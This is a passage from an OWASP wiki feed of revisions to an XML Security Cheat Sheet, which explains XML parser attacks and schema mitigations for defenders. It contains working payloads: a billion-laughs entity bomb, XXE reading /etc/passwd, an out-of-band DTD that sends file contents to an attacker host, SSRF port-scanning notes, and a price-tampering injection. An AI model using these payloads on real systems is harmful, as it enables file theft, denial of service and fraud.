  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224427</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224427"/>
				<updated>2016-12-21T20:14:18Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
